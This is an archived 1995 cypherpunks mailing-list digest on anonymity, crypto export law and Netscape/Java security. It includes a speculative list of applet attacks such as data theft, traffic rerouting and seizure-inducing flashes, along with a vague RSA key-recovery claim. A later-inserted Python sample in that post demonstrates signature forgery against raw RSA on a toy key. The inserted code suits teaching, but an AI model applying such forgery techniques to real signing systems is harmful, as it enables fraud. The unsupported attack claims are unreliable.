Message-ID: <Pine.SUN.3.91.951018170545.15154A-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995 s1018954@aix2.uottawa.ca wrote:

> Nah. I'll take it back. Send encrypted through usenet, receive 
> encrypted through usenet. Best of both, but very slow and only good for 
> voluntary mail reception. 

Not to mention a tremendous waste of bandwidth if people do it on a 
regular basis.

Philosophical question:  Is Usenet a "mix"?

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Thomas Grant Edwards <tedwards@Glue.umd.edu>
Date: Wed, 18 Oct 95 14:09:07 PDT
To: Marianne Mueller <mrm@netcom.com>
Subject: Re: the beverage you are about to drink
In-Reply-To: <199510181814.LAA28754@netcom20.netcom.com>
Message-ID: <Pine.SUN.3.91.951018170831.15154B-100000@hertz.isr.umd.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 18 Oct 1995, Marianne Mueller wrote:

> Doesn't anyone think it's sad-funny now that every styrofoam coffee cup has
> to be labeled "Warning The Beverage You Are About To Consume Is Hot!!" 

The HotJava comparisons are mind-boggling ;)

-Thomas





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frenchie@magus.dgsys.com (SysAdmin)
Date: Wed, 18 Oct 95 14:21:10 PDT
To: cypherpunks@toad.com
Subject: Motherload of Crypto Site...
Message-ID: <m0t5ftL-000xhiC@magus>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

I hope that I'm providing some useful info here.
I came across this site in DDJ (Oct 95).
A comprehensive amount of crypto stuff available. 

Crypto Stuff

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Admiration, n.:
	Our polite recognition of another's resemblance to ourselves.
		-- Ambrose Bierce,

iQCVAgUBMIVvH7bmxeO+s+1xAQHS+AP+ImrrqcHfBi6OGOyu5tSAhNHrpkvPE9E5
qh3e8TsFfbyxq1UXgz73FEFfalhs3GeZOgye5DKp0/vsTQ+ZwQyizKX0XhM/MsNT
zFnv7B2uOACljwqjiMCc6ZiNA25nXveA+TMIa1sZkhTMtwHzVFogE7X4S91F2gBg
Til3urgFAWU=
=C/CT
-----END PGP SIGNATURE-----
=====================PGP Encrypted Mail Preferred========================
       PGP Public Keys: 1024/BEB3ED71 & 2047/D9E1F2E9 on request. 
           As soon as any man says of the affairs of the state 
    " What does it matter to me? " the state may be given up for lost.
                    J.J.Rousseau - The Social Contract
GAT/E/O d++@>- H--- s: a29 C+++$ UL++++($) P+>+++ L++>++++ E W+++ N++ K- 
w---- O- M- V-- PS+ PE++ Y+ PGP+++ t 5+ X R* tv b++ DI++ D++ G++ e h+ r 
y++ [Geek Code v3.0] a.k.a [ root@magus.dgsys.com / vamagus@delphi.com]
==========================================================================



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Wed, 18 Oct 95 17:48:54 PDT
To: cypherpunks@toad.com
Subject: Re: Media Accuracy
In-Reply-To: <9509188140.AA814053942@cc1.dttus.com>
Message-ID: <30859F7A.71B6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Martin Diehl wrote:
> 
>      In the October 16, 1995 issue of PC Week, Spencer F. Katt writes:
> 
>      >Isn't it ironic?  Andreessen creates the WEB while in college; now
>      >college students are finding all the holes in it.  Two students have
>      >uncovered a serious bug in Netscape Navigator, one Katt source
>      >contends.  The browser has a 2K-byte buffer for reading HTML
>      >documents.  Well, these tipsters found that once the page has sent
>      >more than 2K, any assembly code in the HTML document will be
>      >executed.  As an experiment, these kids set up a simple Web server
>      >with some assembly code embedded in the HTML page to overwrite the
>      >client computer's FAT table [sic].  Sure enough, it worked.
> 
>      >spencer@pcweek.ziff.com
> 
>      He might be talking about the (already fixed) bug that allowed an HREF
>      that is longer than 356 bytes to overwrite the stack.  Hadn't heard
>      here that anything would happen other than getting Netscape to crash.
>      No names or URL's were given in the story.  Maybe he needs an update.
>      Maybe we need an update.

  As far as I can tell, this is just an inaccurate re-reporting of
Ray's buffer overflow hack, which we fixed in our security patch.
 
	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: m5@dev.tivoli.com (Mike McNally)
Date: Wed, 18 Oct 95 15:46:57 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: 50 attacks on Netscape - please send the check
In-Reply-To: <9510182213.AA05709@all.net>
Message-ID: <9510182246.AA02614@alpha>
MIME-Version: 1.0
Content-Type: text/plain



Frederick B. Cohen writes:
 > 50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:

Terminology:  "Java" is a programming language, "Hot Java" is the name
of a web browser that supports running Java applets, "Netscape" is the
name of another browser (and the company that makes it) that also in
some versions supports Java applets.

 > Concept 1 - Hot Java code that, once started, takes and retains control
 > of the viewer. ...

How exactly is an applet going to "take control" if the local class
libraries don't allow (for example) the browser's "native" menus to be
overridden?

Isn't it somewhat important to distinguish between attacks along the
lines of what Perry Metzger has suggested (exploiting interpreter bugs
or devious paths through "safe" features) and attacks based on
relatively wild hypothetical speculation?  I mean, just about all of
the "attacks" in this note could just as well be applied to any
software at all that you might choose to run on your machine.  Indeed,
I'd say that Java applets are probably a lot *safer* than an arbitrary
application in a lot of these cases, because they've got less to work
with (the AWT or whatever class libraries the browser makes available,
which could be quite limited).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| Nobody's going to listen to you if you just | Mike McNally (m5@tivoli.com) |
| stand there and flap your arms like a fish. | Tivoli Systems, Austin TX    |
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: chip@communities.com (Chip Morningstar)
Date: Wed, 18 Oct 95 17:42:29 PDT
To: cypherpunks@toad.com
Subject: Re:  50 attacks on Netscape - please send the check
Message-ID: <9510190047.AA14597@ communities.com>
MIME-Version: 1.0
Content-Type: text/plain


fc@all.net (Dr. Frederick B. Cohen) writes:
>50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:
> ... (drivel elided)

This fellow seems to be systematically (if not deliberately) ignorant
about these things.

One of my co-workers reviewed his book on computer viruses in IEEE
Multimedia and noted that it manifests many of the same fallacies. You
can read it (the review, not the book) at

http://www.communities.com/paper/itsalive.html

--
-------------------------------------------------------------------------------
| Chip Morningstar                     |                                      |
| Electric Communities                 | "I'm old enough to be living in      |
| 280 2nd Street, Los Altos, CA 94022  |  the future I was warned about."     |
| 415-917-5640                         |         -- Myron Krueger             |
| chip@communities.com                 |                                      |
-------------------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cjs@netcom.com (cjs)
Date: Wed, 18 Oct 95 18:41:32 PDT
To: fc@all.net (Dr. Frederick B. Cohen)
Subject: Re: 50 attacks... [NOISE]
In-Reply-To: <9510190043.AA11578@all.net>
Message-ID: <199510190110.SAA02346@netcom23.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


> Boy, you people just don't appreciate anything that has a little bit of
> humor mixed with a little bit of reality. 

A little reality?? I've seen episodes of Star Trek with more reality.

Get real,
Christopher



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 18 Oct 95 15:16:28 PDT
To: cypherpunks@toad.com
Subject: 50 attacks on Netscape - please send the check
Message-ID: <9510182213.AA05709@all.net>
MIME-Version: 1.0
Content-Type: text


50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:

Concept 1 - Hot Java code that, once started, takes and retains control
of the viewer.  It includes hot buttons, etc.  that let you use common
resources on the net, store favorite places, etc.  When you push any
button in this window, it simulates Hot Java within its own code, but
all reads and writes contain code to restart the program (such as the
"remember favorite places" button, etc.).

	Attack 1 - It records all entries and sends them to an unfriendly.
	This includes credit card numbers, etc.

	Attack 2 - It reroutes all traffic through a known site to record
	information about all of your accesses.

	Attack 3 - It selectively multiplies dollar values on purchases up
	by a factor of 10 when you authorize purchases through their store.

	Attack 4 - It reroutes all purchases through their intermediary and
	adds 20% for the service, thus becoming the middle person in all
	your transactions.

	Attack 5 - It replaces select information from select sites with
	false or misleading information - particularly about the competition.

	Attack 6 - It reports certain sites as down, thus damaging the reputation
	of those sites.

	Attack 7 - It sends requests to sites and ignores their answers to increase
	hit rates on key vendors that pay for their W3 sites based on usage.

	Attack 8 - It gets dirty pictures using your credit card information
	and sends it to another recipient.

	Attack 9 - It implements an anonymous remailer for smut, thus making
	you the smut capital of the network.

	Attack 10 - It waits till you save another Java code from the
	net and replaces the code with its own code and a pointer to the
	code you thought you got.

	Attack 11 - It waits till you save a file and overflows your disk with
	garbage.

	Attack 12 - It sends displays that flash on the screen at a rate that
	causes epileptic seizures.

	Attack 13 - It puts up subliminal messages to cause you to
	accept its subsequent request to overwrite a .com file onto your
	disk.

	Attack 14 - It analyzes your typing style to determine psychological
	factors and stores that information in a database.

	Attack 15 - It analyzes your typing style to determine psychological
	factors and, if you are a child, connects you to child pornography
	rings.

	Attack 16 - It sends requests for URLs to numerous addresses on
	your network, records results, and returns a network map to the
	attacker.

	Attack 17 - It uses spare time when you are not computing to participate
	in codebreaking activities, including the breaking of netscape codes.

	Attack 18 - It sends massive quantities of email to mailing lists
	creating the impression that you are not a nice person (a spammer)

	Attack 19 - When it receives incoming email, it sends copies to
	newsgroups who now have access to all your personal incoming mail.

	Attack 20 - When you send outgoing email, it sends copies to
	newsgroups who now have access to all your personal outgoing mail.

	Attack 21 - When you send outbound email, it adds insulting or
	abusive humor to the end of your signature line.

	Attack 22 - It is used to send and receive email as part of a
	right wing group's coordination activities aimed at overthrowing the
	government.

	Attack 23 - It slowly fades your screen till you think the
	display is going bad, forcing you to buy a new display.

	Attack 24 - It slowly degrades performance causing you to think you need
	a faster computer.

	Attack 25 - It sends threatening email to the President under
	your name, getting you arrested.

	Attack 26 - It sends embarrassing email to the New York Times getting
	you fired.

Concept 2 - Hot Java code that sends all of your messages through my computer
and gets the results back from my computer by rewriting URLs on-the-fly.

	Attack 27 - Attack 3 from above, but with more intelligence so that
	amounts are changed less obviously.

	Attack 28 - Attack 4 from above, but it also changes the costs on incoming
	information so that you can't detect the price change in the process.

	Attack 29 - Attack 5 from above, except that it is more sophisticated -
	like creating misspellings or poor formatting or moving the locations
	in maps so that when you push on one part of a map, it sends a different
	part to the server.

	Attack 30 - Attack 6 from above, except that instead of reporting servers
	down, it makes them seem very slow, or misses lines of pictures, etc. to
	make them look bad but without causing trouble reports.

	Attack 31 - Records all credit card transactions and forwards information
	to services that pay to know what you buy.

	Attack 32 - Determines whether you look at dirty pictures and, if so,
	sends the information to criminals to use against you in shakedowns.

	Attack 33 - Replaces legitimate calls to children's pages with child
	pornography - including solicitations for where you can become a star.

	Attack 34 - Adds subliminal messages to sound files that cause you to
	enter a murderous rage (as in the claims about acid rock a few years
	back).

	Attack 35 - Adds dirty pictures to video files causing you to become
	sex-crazed and commit sex crimes and have bad dreams.

	Attack 36 - Causes simulated waviness on the screen, resulting in
	dizziness and increased sick time at work.

	Attack 37 - Introduces high frequency buzzing that irritates people
	and causes them to become more violent and less cooperative.

	Attack 38 - Introduces low frequency beating (similar to the tactics used
	against the Branch Davidians and in Viet Nam) to weaken your resolve and
	then asks you to confirm the upload of a program.

	Attack 39 - Creates subliminal feedback to your use of the Web to get
	you to tend toward particular services and away from others.

	Attack 40 - Adds background advertising to all your pictures.

	Attack 41 - Replaces the background information provided by Web sites
	with the attacker's background advertising.

	Attack 42 - Shifts frequencies of sound files from select other sites
	so they seem off-pitch and don't reflect well on those companies.

	Attack 43 - Reroutes all of your Web requests through the NSA and CIA
	so they can do better intelligence.

	Attack 44 - Causes select Web sites to require User ID and Password
	information before use (particularly company Web sites) so as to get
	you to reveal your UIDs and passwords.

	Attack 45 - Renames Web sites so that your remembered sites only
	work for a few days and then the pointers appear to go away.

	Attack 46 - Puts a lot of really interesting things on your screen, thus
	making you believe that the Web is really great, and then removes them
	from accessibility when you try to get them again.

	Attack 47 - Universally replaces the word AND with OR in all Web information.

	Attack 48 - Randomizes all 5-digit numbers sent via the Web, thus confusing all
	zip codes contained in address fields.

	Attack 49 - Sends a series of high frequency sounds combined with screen
	flashes designed to cause permanent brain damage.


Concept 3 - There is a chosen plaintext attack against the RSA (published in the
1980s in a Crypto conference (IACR?)).

	Attack 50 - Use your Hot Java capability to sign selected
	message after message till the attacker derives your private key.
	I think this takes one or two messages per bit of private key.

	Bonus Attack (no extra charge) - If they use your PGP random
	number information, they get your PGP key too!


Netscape: Please send your check for US$50,000 to the address below.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
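
Added example, not part of the original post: Concept 3 does not name the attack it has in mind, so this sketch assumes it belongs to the chosen-message family against raw (unpadded) RSA signing, where signatures on chosen inputs yield a valid signature on a value the signer never saw. The toy key, messages and function names are constructed for illustration; the second half shows why a signer that only ever exponentiates a digest is not exposed in the same way.

```python
import hashlib

# Constructed toy key (assumption, illustration only): two Mersenne primes
# give a ~92-bit modulus, far too small for real use.
P = 2**31 - 1
Q = 2**61 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))  # private exponent (needs Python 3.8+)


def sign_raw(m: int) -> int:
    """Unsafe signer: exponentiates whatever integer the caller supplies."""
    return pow(m % N, D, N)


def verify_raw(m: int, sig: int) -> bool:
    return pow(sig, E, N) == m % N


def digest_int(message: bytes) -> int:
    """SHA-256 reduced mod N. A simplified stand-in for a standard
    signature encoding such as RSASSA-PSS, which real systems should use."""
    return int.from_bytes(hashlib.sha256(message).digest(), "big") % N


def sign_hashed(message: bytes) -> int:
    """Safer signer: the caller never chooses the integer that is signed."""
    return pow(digest_int(message), D, N)


def verify_hashed(message: bytes, sig: int) -> bool:
    return pow(sig, E, N) == digest_int(message)


def combine(sig_a: int, sig_b: int) -> int:
    """Multiply two signatures; for raw RSA this signs the product."""
    return (sig_a * sig_b) % N


def blind(m: int, r: int) -> int:
    """Hide m behind r^E so the signer sees an unrelated-looking value."""
    return (m * pow(r, E, N)) % N


def unblind(sig: int, r: int) -> int:
    return (sig * pow(r, -1, N)) % N


def demo() -> dict:
    # Raw signing: two honest signatures combine into a third one.
    m1, m2 = 1995, 50000
    raw_product_accepted = verify_raw(m1 * m2, combine(sign_raw(m1), sign_raw(m2)))

    # Raw signing: the signer signs a blinded value, the result unblinds
    # to a signature on a target the signer never saw.
    target, r = 424242, 12345
    blinded = blind(target, r)
    raw_blinded_accepted = blinded != target and verify_raw(
        target, unblind(sign_raw(blinded), r)
    )

    # Hashed signing: the same algebra still holds on the digests, but the
    # product matches no message whose digest the requester can produce.
    a, b = b"pay 10 dollars", b"pay 100 dollars"
    sig_a, sig_b = sign_hashed(a), sign_hashed(b)
    product = combine(sig_a, sig_b)
    return {
        "raw_product_accepted": raw_product_accepted,
        "raw_blinded_accepted": raw_blinded_accepted,
        "hashed_genuine_accepted": verify_hashed(a, sig_a),
        "hashed_product_rejected": not any(
            verify_hashed(msg, product) for msg in (a, b, a + b)
        ),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```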



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David Neal" <dneal@electrotex.com>
Date: Wed, 18 Oct 95 16:49:46 PDT
To: cypherpunks@toad.com
Subject: Re: Anonymity: A Modest Proposal
Message-ID: <199510182357.SAA05686@etex.electrotex.com>
MIME-Version: 1.0
Content-Type: text/plain


> Date:          Wed, 18 Oct 1995 16:01:00 -0400 (EDT)
> From:          s1018954@aix2.uottawa.ca
> Reply-to:      s1018954@aix2.uottawa.ca
> Subject:       Re: Anonymity: A Modest Proposal
> To:            Doug Cutrell <doug@cdsnet.net>
> Cc:            cypherpunks@toad.com

> 
> 
> On Wed, 18 Oct 1995, Doug Cutrell wrote:
> 
> > It seems that there could at least be a hierarchy of shadowed newsgroups,
> > e.g. alt.freespeech.*,  requiring the enduser to use special software to
> > reassemble actual postings.  This could even be integrated into the
> > newsreaders, or even at a local newserver level.
> 
> There already is. I think the *.test (or at least alt.test) groups have 
> good propagation. Nobody "reads" anything but their own posts anyway, so the
> natives wouldn't be bothered. 
>

YIKES!   Think again.  Many of the *.test newsgroups have auto-responders
that remail the poster assuring them their post was received.  This feature
is used to make sure your newsfeed is working.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Julius Cisek <jules@netscape.com>
Date: Wed, 18 Oct 95 18:49:59 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
In-Reply-To: <3084DD5B.4AD1@netscape.com>
Message-ID: <3085AE63.BB6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen wrote:
> WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> be secure - regardless of the user's use of their product.  Otherwise,
> the ads should read:
> 
>         "Netscape can be used securely by sufficiently knowledgeable
>         users who have emasculated their postscript interpreters before
>         using them to view files of unknown origin, and who have removed
>         all other known, unknown, and/or undisclosed security holes from
>         their systems.  Otherwise, Netscape is insecure and should not be
>         trusted."

Err...  If software companies were to follow your line of logic, software
boxes (all sorts of software) would become covered with fine print.  As
would ads for the software.  Although I'm sure industry lawyers would
welcome that, personally I think it would be quite sad.

A stupid example:
I can replace copy on your machine so that it does a delete instead.
Does that mean that the OS manufacturer has to warn a user about this?

There's a point at which one has to hand off the assessment to the buyer.

This is my own opinion and also that of anyone who agrees with me.
I'm reading this group because it's very interesting for me personally.
There.

-- 

~Jules (Julius Cisek)   /- __  -   mailto:jules@netscape.com
Server Eng, NETSCAPE  /\ >\=/\ --- http://home.netscape.com/people/jules
MtnView-CA-USA-Earth  \/   -\/ --  p:415.528.2968 f:415.528.4122
          ---===> COGITO ERGO VROOM <===---




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dawg@frontier.wilpaterson.edu
Date: Wed, 18 Oct 95 16:46:03 PDT
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <9510182347.AA05742@frontier.wilpaterson.edu>
MIME-Version: 1.0
Content-Type: text/plain


hi.
 i'd like some info.
thanks.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 18 Oct 95 19:05:17 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <DGnrDy.H3G@sgi.sgi.com>
Message-ID: <199510190205.TAA12988@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGnrDy.H3G@sgi.sgi.com>, anonymous-remailer@shell.portal.com writes:

> Is your comment about the "Bugs Bounty" program an official comment, that
> you have "no idea how valuable" it will be??  Shall I give you a clue,
> as to how valuable the discovery of a flawed algorithm might be??

[ ... ]

> Alice de 'nonymous ...

I've deleted the rest of your content-free rant.  Instead of alluding to
some "flawed algorithm", why not tell us about the hole you say you've
found in netscape?

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 18 Oct 95 19:09:51 PDT
To: cypherpunks@toad.com
Subject: Re: java flaw
In-Reply-To: <DGMpss.5q6@sgi.sgi.com>
Message-ID: <199510190209.TAA12996@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGMpss.5q6@sgi.sgi.com>, fc@all.net (Dr. Frederick B. Cohen) writes:

>> 
>> At 06:59 AM 10/17/95 UTC, jerry the golden retriever wrote:
>> > A security feature in Java scans for viruses before activating the
>> > applet.
>> 
>> I hope that this is false.
>> 
>> Even if one had genuine artificial intelligence, it would be impossible
>> to detect all viruses, only particular viruses and classes of virus.
>> 
>> If Java is secure, virus scanning should be unnecessary, indeed 
>> impossible, because there could be no code configuration capable
>> of acting as a virus.
>> 
>> If virus scanning occurs, then it is possible to write a virus in Java,
>> then Java is inherently insecure.

> To be more precise, if there is programming, sharing, and transitive
> information flow, viruses can reproduce and spread (as proven
> mathematically in the mid-1980s).  Since Java offers sharing of
> programs and (for now at least) transitive information flow, viruses
> are possible.

I'm certainly no expert on viruses, but doesn't that have to be
transitive flow of executable information?  If I'm just shipping data
around, there's no way you can infect me.  Does Java allow the client to
upload an applet to the server?  Can applets persist between netscape
sessions?  If the answer to both of these questions is no, then the
viability of viruses should be substantially degraded.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Wed, 18 Oct 95 17:28:13 PDT
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: [NOISE] Re: 50 attacks on Netscape - please send the check
In-Reply-To: <9510182213.AA05709@all.net>
Message-ID: <Pine.SUN.3.90.951018191650.5047A-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


Bah, I am tired of this bullshit.
To begin, the applet can't "take control" of HotJava. You can quit or return
to the previous page (thus stopping the applet). Furthermore,
the guys at Sun are rewriting the code such that new frames are marked
all over with warnings just like in safe TCL/TK. I am sure that Netscape
will follow suit. If you will please stop your ramblings or back up your
stupid claims with code it will cut down the noise on this list generated
by you and people like me that can't take it any longer and have to reply
quite a bit.

Oh, BTW, any such application anyway would be so big that the attack
would only be possible on people with T1 connections. Who in their right mind
is gonna d/l and load an 8 meg applet?

P.S. Jeff I think you guys are doing a terrific job. I am sorry you have
to get grilled by mindless idiots all day long.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 

On Wed, 18 Oct 1995, Dr. Frederick B. Cohen wrote:

> Date: Wed, 18 Oct 1995 18:13:43 -0400 (EDT)
> From: Dr. Frederick B. Cohen <fc@all.net>
> To: cypherpunks@toad.com
> Subject: 50 attacks on Netscape - please send the check
> 
> 50 Attacks: a.k.a. Why Not to Run Hot Java in your netscape (or other) browser:
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tomw@orac.engr.sgi.com (Tom Weinstein)
Date: Wed, 18 Oct 95 19:29:44 PDT
To: cypherpunks@toad.com
Subject: Re: Postscript in Netscape
In-Reply-To: <DGn8F6.50y@sgi.sgi.com>
Message-ID: <199510190229.TAA13011@orac.engr.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <DGn8F6.50y@sgi.sgi.com>, fc@all.net (Dr. Frederick B. Cohen) writes:

> Jeff Weinstein - Electronic Munitions Specialist Wrote:
> ...
>> If a user configures a postscript viewer that has not had the
>> file operations disabled as a helper app to any web browser then
>> they are opening themselves up for a world of hurt.  The same is
>> true if they just download the file and run their viewer on it
>> manually.  The same is true if they configure /bin/sh as an
>> external viewer.
>> 
>> Obviously everyone should heed perry's warnings and emasculate
>> their postscript interpreters before using them to view files
>> of unknown origin.

> WRONG!!! Netscape claims to be "secure" - hence it is Netscape's job to
> be secure - regardless of the user's use of their product.  Otherwise,
> the ads should read:

> 	"Netscape can be used securely by sufficiently knowledgeable
> 	users who have emasculated their postscript interpreters before
> 	using them to view files of unknown origin, and who have removed
> 	all other known, unknown, and/or undisclosed security holes from
> 	their systems.  Otherwise, Netscape is insecure and should not be
> 	trusted."

If the user sets up a postscript viewer as an external viewer for
postscript files, it's not Netscape's fault if the viewer does something
insecure.

-- 
Sure we spend a lot of money, but that doesn't mean    |  Tom Weinstein
we *do* anything.  --  Washington DC motto             |  tomw@engr.sgi.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Gilmore <gnu@toad.com>
Date: Wed, 18 Oct 95 19:45:09 PDT
To: cypherpunks, cypherpunks-announce, gnu
Subject: REMINDER: SF Federal Building, Oct 20, 1015AM: Bernstein case
Message-ID: <9510190245.AA20897@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Last reminder!  Come to the Federal Building in SF this Friday at
10:15AM, go upstairs to Judge Marilyn Hall Patel's courtroom, and Be
There for the first skirmish in the trial of crypto export controls.
450 Golden Gate Avenue in downtown SF, two blocks from Van Ness.

We've gotten a lot of press interest.  Both the legal-newspapers in
SF, the Examiner, and many others will be covering it.  Some of them
breathlessly asked, "Will the cypherpunks hold a demonstration?", but
what we will demonstrate is how the legal system can turn against the
bureaucrats and authoritarians who currently hold crypto hostage.

This will be a low-key meeting, quietly bearing witness, at least
before we adjourn to a probably rowdy lunch at Max's Opera Cafe at Van
Ness and Golden Gate Avenues.  If you can't come to the hearing, at
least come for lunch!

And don't forget, it's a costume party: Dress like a banker.  Even
you bitbankers.  Even me.  See you there!

	John




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdavidm@iconz.co.nz (David Murray)
Date: Wed, 18 Oct 95 00:03:05 PDT
To: cypherpunks@toad.com
Subject: Re: transaction costs in anonymous markets
Message-ID: <pnr096593132l@iconz.co.nz>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <Pine.SUN.3.91.951016011355.2241A-100000@eskimo.com> Wei Dai said:

 "Maintaining anonymity requires that communications be done through 
 special untraceable protocols."

I think it is important to keep in mind exactly what we mean by anonymity
in these discussions - there seems to be a bewildering array of flavours.

Take three situations where anonymity might be useful:

1. The State Authorities come and take you away for subscribing to a
publication advocating the end of socialised medicine.

2. The State Authorities come and take your assets away to pay for socialised
medicine.

3. The Private Hospital comes and takes your assets away to pay for your
lifesaving operation.

[Avoiding 1 is (in my opinion) an unmitigated good; avoiding 2 is obviously
desirable; but avoiding 3 could well be counter-productive.]

This points to two categories of anonymity:

   Meat anonymity - there is no way of knowing which human is responsible; and
   Asset anonymity - there is no way of linking a particular human, transaction
                     or activity to any particular asset, or vice versa.

The point being that sometimes one will be desirable without the other.

Concentrating on meat (or combined?) anonymity, there are (at least) two
sorts;

   Legal anonymity - where the split between asset and meat is the result
                     of the interposition of some legal structure (eg. Trust,
                     corporation etc), the ultimate owners/controllers of
                     which are unknown; and
   Digital anonymity - where the identity of the actor is mathematically
                       unknowable (at least, at the limit).

Obviously, these sorts can be layered, with legal entities transacting as
digitally anonymous parties, and the owners of those legal entities protected
by digital anonymity.

In addition, we can distinguish between digital anonymity that allows no
link between separate transactions (anonymity proper[?]), and digital
anonymity that does allow links to be drawn between separate transactions
or activities (pseudonymity).

Similarly, we can distinguish between the various anonymous properties of
transactions:

A. Private Transactions. Each party to the transaction knows the identity
of the others, but no third party can know who is transacting with whom.

B. Unilateral Anonymity. One party to the transaction is known, but the other
is unknowable. An example might be subscribing for a digital security with
ecash - the issuer is known, but the purchaser is anonymous.

C. Bilateral Anonymity. The identities of both parties to the transaction
are unknowable. This might be the case on a cypherpunk stock exchange...

                                        "The current state-of-art (i.e. 
 RemailerNet) adds several hours of transmission time to each message to 
 achieve effective untraceability.  Contract negotiation, for example, 
 becomes very difficult under these circumstances."

My experience of contract negotiation is that a delay of hours would be
immaterial. Don't forget that email, fax machines, and even the telephone
are relatively recent phenomena (not to mention the photocopier and the
word-processor). Most super-tight deadlines are self-inflicted.

"If these costs remain high, but anonymous markets develop regardless, it 
will be interesting to see how these costs affect the structure of the 
markets.  Will special protocols for contract negotiations develop to 
minimize the number of round-trip messages?"

Doubtless. In areas where complex transactions really have to be entered
into at short notice, a lot of the negotiation goes on in advance, often
by trade associations. ISDA, for instance, is forever producing standard
terms and appendices so that all manner of arcane derivative transactions
can be more or less negotiated over the phone.

Cheers,

Dm


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMISijFlo3j8JHzalAQENEAP/UJTSvhAR534mh1KUQZQC1JYxZeROUaDf
6Nd42yxCmLbbSa72dEAB69jdfDHBj2sj6Jf6jL+HAGTrfG6I/dNJuKu9MaaCw64z
MKe0efTCmD2caehOv9lf5tI2uJ0vAql8UdCC5gj3NhkxKr/uEAvcbIlt/Z60mmEu
4P2hxCv1u/o=
=U8gP
-----END PGP SIGNATURE-----

[Palmtop News Reader - Beta Version 3]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1018954@aix2.uottawa.ca
Date: Wed, 18 Oct 95 17:19:39 PDT
To: David Neal <dneal@electrotex.com>
Subject: Re: Anonymity: A Modest Proposal
In-Reply-To: <199510182357.SAA05686@etex.electrotex.com>
Message-ID: <Pine.3.89.9510182023.B109863-0100000@aix2.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 18 Oct 1995, David Neal wrote:

> YIKES!   Think again.  Many of the *.test newsgroups have auto-responders
> that remail the poster assuring them their post was received.  This feature
> is used to make sure your newsfeed is working.

Yeah, but you can turn them off by having "Test" in your header. I 
discovered this after getting my mailbox filled with those bloody 
auto-responses. It isn't really important since you're posting your file 
encrypted a second time in the first remailer's key, so the received file
will bear no resemblance to the original. 

And as far as wasting a lot of bandwidth is concerned, it would never be worse 
than the alt.binaries newsgroups.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 18 Oct 95 17:46:25 PDT
